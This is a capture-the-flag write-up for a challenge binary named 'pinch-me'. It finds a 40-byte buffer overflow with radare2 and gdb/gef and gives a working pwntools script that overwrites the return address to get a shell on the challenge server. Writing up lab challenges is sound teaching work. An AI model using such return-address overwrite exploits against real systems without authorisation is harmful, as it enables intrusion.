![2d1d58afb31029ae613b942ee8482bae.png](2c113d703dca483d8e2c197611f081b3.png) Taking a look at the file we can see that it's a **64-bit Elf** binary ``` pwnchal: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), ``` Nothing really stands out when analyzing with **radare2**. No win function this time, so let's take a look at the **vuln** function ![b70c51cd1881ecdc338d7b53d643a415.png](8d4f2fbb719449f7a1c6844c832b8b91.png) Looks like there's an address that gives us a shell. Let's skip all the checks and just jump straight to that. Loading the binary into **gdb** (using gef support), we can start poking at it and try to find the offset I was having issues with `pattern create/search` so I did it the old fashioned way: sending lots of 'A's and 'B's until something looked neat Using **gdb with gef** you can use `pi print('A'*100)` to quickly toss a string of characters together After sending different lengths, I found that **40** was when we started seeing the 'B' characters leak in `pi print('A'*40 + 'B')` ![180143eea7ff9f522522baac11c964d9.png](7f249bdae6ae4472aea3b063740f195a.png) Things we know 1. It's a **64-bit ELF** binary 2. The address we want to jump to is 0x004011a1 3. The offset is 40 Here's my script using **pwntools** ```Python from pwn import * p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io', 7480) offset = b'A'* 40 p.recvuntil('dreaming?\n') p.sendline(offset + p64(0x004011a1)) p.interactive() ``` The `p64(0x004011a1)` function call packs the address in **Little Endian** format, required to be passed, and `p.interactive()` just catches the shell and allows us to send input. ![a1b9d579310f2aef21cded3a2d701bd0.png](11afecc367004cbc991ee0df833aa92e.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #exploit_development #buffer_overflow #gdb #gef Related: